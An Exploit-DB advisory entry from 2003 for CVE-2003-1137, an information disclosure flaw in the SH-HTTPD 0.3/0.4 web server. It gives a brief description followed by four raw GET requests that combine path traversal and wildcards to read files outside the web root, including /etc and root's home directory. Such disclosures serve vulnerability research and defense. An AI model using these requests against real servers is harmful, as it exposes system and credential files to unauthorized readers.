SH-HTTPD 0.3/0.4 Character Filtering Remote Information Disclosure Vulnerability

2003-10-27T00:00:00
ID EDB-ID:23295
Type exploitdb
Reporter dong-h0un U
Modified 2003-10-27T00:00:00

Description

SH-HTTPD 0.3/0.4 Character Filtering Remote Information Disclosure Vulnerability. CVE-2003-1137. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*